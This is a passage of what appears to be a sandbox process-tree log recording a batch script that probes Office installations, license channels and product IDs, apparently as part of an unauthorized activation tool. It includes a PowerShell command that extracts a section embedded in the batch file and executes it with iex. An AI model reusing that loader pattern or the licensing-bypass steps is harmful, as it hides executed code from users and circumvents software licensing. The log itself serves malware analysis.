C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5500 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:5564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\16.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5588 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\16.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:5604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5576 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:5624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- System Location Discovery: System Language Discovery
PID:5644 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds4⤵
- Modifies registry key
PID:5660
-
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"MondoVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5676
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlusVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2924
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5704
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3060
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"StandardVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5748
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5632
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5772
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"AccessVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:664
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusinessVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5876
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OneNoteVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5892
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ExcelVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5908
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OutlookVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5836
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPointVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5816
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PublisherVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5840
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"WordVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5848
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProXVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5856
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdXVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5808
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProXVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5800
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdXVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5964
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"MondoRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:6072
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlusRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:6104
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:6020
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:6012
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"StandardRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:6048
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:6044
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:6136
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"AccessRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5164
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusinessRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5200
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OneNoteRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:396
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ExcelRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:1668
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OutlookRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2760
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPointRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:1076
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PublisherRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3744
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"WordRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:1940
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProfessionalRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2004
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeBusinessRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4888
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeStudentRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5248
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365BusinessRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5280
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365SmallBusPremRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:112
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365HomePremRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2108
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365EduCloudRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5308
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:876
-
-
C:\Windows\system32\findstr.exefindstr 20193⤵PID:3804
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:5076
-
-
C:\Windows\system32\findstr.exefindstr 20213⤵PID:4284
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:4392
-
-
C:\Windows\system32\findstr.exefindstr 20243⤵PID:3188
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msoxmled.exe"3⤵PID:4860
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "Description like '%KMSCLIENT%' AND NOT Name like '%MondoR_KMS_Automation%'" get Name /value3⤵PID:4344
-
-
C:\Windows\system32\find.exefind /i "Office 16" "C:\Windows\Temp\sppchk.txt"3⤵PID:5380
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND NOT Name like '%O365%'" get Name /value3⤵PID:5448
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5468
-
-
C:\Windows\system32\find.exefind /i "Office 14"3⤵PID:5464
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5496
-
-
C:\Windows\system32\find.exefind /i "Office 15"3⤵PID:5472
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5548
-
-
C:\Windows\system32\find.exefind /i "Office 16"3⤵PID:5568
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5544
-
-
C:\Windows\system32\find.exefind /i "Office 19"3⤵PID:5596
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5588
-
-
C:\Windows\system32\find.exefind /i "Office 21"3⤵PID:5612
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5576
-
-
C:\Windows\system32\find.exefind /i "Office 24"3⤵PID:5672
-
-
C:\Windows\system32\find.exefind /i "Office16ProPlusR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5648
-
-
C:\Windows\system32\find.exefind /i "Office16StandardR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5676
-
-
C:\Windows\system32\find.exefind /i "Office16AccessR" "C:\Windows\Temp\sppchk.txt"3⤵PID:2924
-
-
C:\Windows\system32\find.exefind /i "Office16SkypeforBusinessR" "C:\Windows\Temp\sppchk.txt"3⤵PID:640
-
-
C:\Windows\system32\find.exefind /i "Office16ExcelR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5756
-
-
C:\Windows\system32\find.exefind /i "Office16OutlookR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5632
-
-
C:\Windows\system32\find.exefind /i "Office16PowerPointR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5772
-
-
C:\Windows\system32\find.exefind /i "Office16PublisherR" "C:\Windows\Temp\sppchk.txt"3⤵PID:664
-
-
C:\Windows\system32\find.exefind /i "Office16WordR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5876
-
-
C:\Windows\system32\find.exefind /i "Office16ProfessionalR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5892
-
-
C:\Windows\system32\find.exefind /i "Office16HomeBusinessR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5948
-
-
C:\Windows\system32\find.exefind /i "Office16HomeStudentR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5824
-
-
C:\Windows\system32\find.exefind /i "Office16ProjectProR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5868
-
-
C:\Windows\system32\find.exefind /i "Office16ProjectStdR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5848
-
-
C:\Windows\system32\find.exefind /i "Office16VisioProR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5856
-
-
C:\Windows\system32\find.exefind /i "Office16VisioStdR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5812
-
-
C:\Windows\system32\sc.exesc query ClickToRunSvc3⤵
- Launches sc.exe
PID:5984
-
-
C:\Windows\system32\sc.exesc query OfficeSvc3⤵
- Launches sc.exe
PID:5964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:6088 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:6112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5924 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:5732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\15.0\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5140 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:6020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:6012 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:6048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:6044 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:6136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5164 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:5212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v PackageGUID" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:4356 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v PackageGUID4⤵
- Modifies registry key
PID:3156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:1712 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds4⤵
- Modifies registry key
PID:3592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs /v ActiveConfiguration" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:1304 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs /v ActiveConfiguration4⤵
- Modifies registry key
PID:1060
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5160 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:5148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3888 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:228
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingService get Version /value3⤵
- System Location Discovery: System Language Discovery
PID:388 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingService get Version /value4⤵PID:5304
-
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND LicenseStatus='1' AND PartialProductKey is not NULL" get Description3⤵PID:2812
-
-
C:\Windows\system32\findstr.exefindstr /V /R "^$"3⤵PID:5312
-
-
C:\Windows\system32\find.exefind /i "RETAIL channel" "C:\Windows\Temp\crvRetail.txt"3⤵PID:4984
-
-
C:\Windows\system32\find.exefind /i "RETAIL(MAK) channel" "C:\Windows\Temp\crvRetail.txt"3⤵PID:4360
-
-
C:\Windows\system32\find.exefind /i "TIMEBASED_SUB channel" "C:\Windows\Temp\crvRetail.txt"3⤵PID:1236
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "$f=[IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\active.bat') -split ':embdbin\:.*';iex ($f[5])"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5192
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663'" get LicenseFamily3⤵PID:4072
-
-
C:\Windows\system32\findstr.exefindstr /V /R "^$"3⤵PID:5764
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Professional2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3316
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeBusiness2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5772
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeStudent2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:664
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Home2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3452
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlus2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5376
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Standard2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5904
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Excel2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5908
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Outlook2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5796
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPoint2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5864
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Word2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5920
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Access2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5792
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusiness2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5808
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectPro2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5800
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStd2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5960
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioPro2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5964
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStd2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:6108
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Professional2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:6088
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeBusiness2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5732
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeStudent2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5924
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlus2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5976
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Standard2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5140
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Excel2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:6048
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Outlook2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:6012
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPoint2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5144
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Publisher2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:6044
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Word2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5232
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Access2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5164
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusiness2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:6024
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectPro2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4356
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStd2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2760
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioPro2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1712
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStd2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3744
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Professional2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1304
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeBusiness2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1940
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeStudent2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5168
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlus2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2372
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Standard2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:928
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Excel2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5292
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Outlook2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5248
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPoint2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4888
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Publisher2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5620
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Word2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5516
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Access2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2260
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusiness2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1808
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectPro2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3476
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStd2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4852
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioPro2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4452
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStd2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:112
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProfessionalRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2812
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeBusinessRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4860
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeStudentRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5368
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365ProPlusRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5132
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365BusinessRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4372
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365SmallBusPremRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5420
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365HomePremRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5432
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365EduCloudRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5480
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"MondoRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1952
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"StandardRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5592
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ExcelRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5472
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OutlookRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5500
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPointRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5596
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PublisherRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5604
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"WordRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:692
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"AccessRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5332
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusinessRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5748
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5696
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3128
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5408
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3160
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OneNoteRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5184
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlus2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5392
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Standard2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5320
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Excel2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4840
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Outlook2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5648
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPoint2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5676
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Publisher2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2924
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Word2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:920
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Access2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5020
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusiness2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4040
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectPro2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4344
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStd2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1772
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioPro2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5784
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStd2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:640
-
-
